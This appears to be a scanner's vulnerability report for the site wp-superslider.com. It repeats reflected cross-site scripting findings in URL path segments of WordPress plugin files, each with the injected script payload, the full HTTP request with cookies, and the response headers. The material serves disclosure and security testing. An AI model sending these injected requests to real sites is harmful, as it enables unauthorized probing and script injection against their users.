Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dfd"><script>alert(1)</script>f981ff2d39 was submitted in the REST URL parameter 6. This input was echoed as e1dfd\"><script>alert(1)</script>f981ff2d39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd"><script>alert(1)</script>f981ff2d39 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acc0"><script>alert(1)</script>5fc51608de0 was submitted in the REST URL parameter 1. This input was echoed as 3acc0\"><script>alert(1)</script>5fc51608de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site3acc0"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad888"><script>alert(1)</script>85bc6e4dd3f was submitted in the REST URL parameter 5. This input was echoed as ad888\"><script>alert(1)</script>85bc6e4dd3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-dataad888"><script>alert(1)</script>85bc6e4dd3f/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a684e"><script>alert(1)</script>627dceec1f5 was submitted in the REST URL parameter 7. This input was echoed as a684e\"><script>alert(1)</script>627dceec1f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCata684e"><script>alert(1)</script>627dceec1f5/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fcaf"><script>alert(1)</script>da9e0f185c2 was submitted in the REST URL parameter 8. This input was echoed as 2fcaf\"><script>alert(1)</script>da9e0f185c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default2fcaf"><script>alert(1)</script>da9e0f185c2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89b32"><script>alert(1)</script>7331cbe4720 was submitted in the REST URL parameter 9. This input was echoed as 89b32\"><script>alert(1)</script>7331cbe4720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css89b32"><script>alert(1)</script>7331cbe4720 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:13 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674594+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674594; expires=Thu, 02-Feb-2012 19:23:14 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448d"><script>alert(1)</script>cc9ed16c3fe was submitted in the REST URL parameter 1. This input was echoed as 5448d\"><script>alert(1)</script>cc9ed16c3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site5448d"><script>alert(1)</script>cc9ed16c3fe/wp-content/plugins/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d297"><script>alert(1)</script>6e88aecf5d was submitted in the REST URL parameter 2. This input was echoed as 5d297\"><script>alert(1)</script>6e88aecf5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content5d297"><script>alert(1)</script>6e88aecf5d/plugins/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82075"><script>alert(1)</script>60d6f3a8f48 was submitted in the REST URL parameter 3. This input was echoed as 82075\"><script>alert(1)</script>60d6f3a8f48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins82075"><script>alert(1)</script>60d6f3a8f48/superslider-show/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3bd6"><script>alert(1)</script>741621bff9a was submitted in the REST URL parameter 4. This input was echoed as d3bd6\"><script>alert(1)</script>741621bff9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-showd3bd6"><script>alert(1)</script>741621bff9a/js/lightbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53335

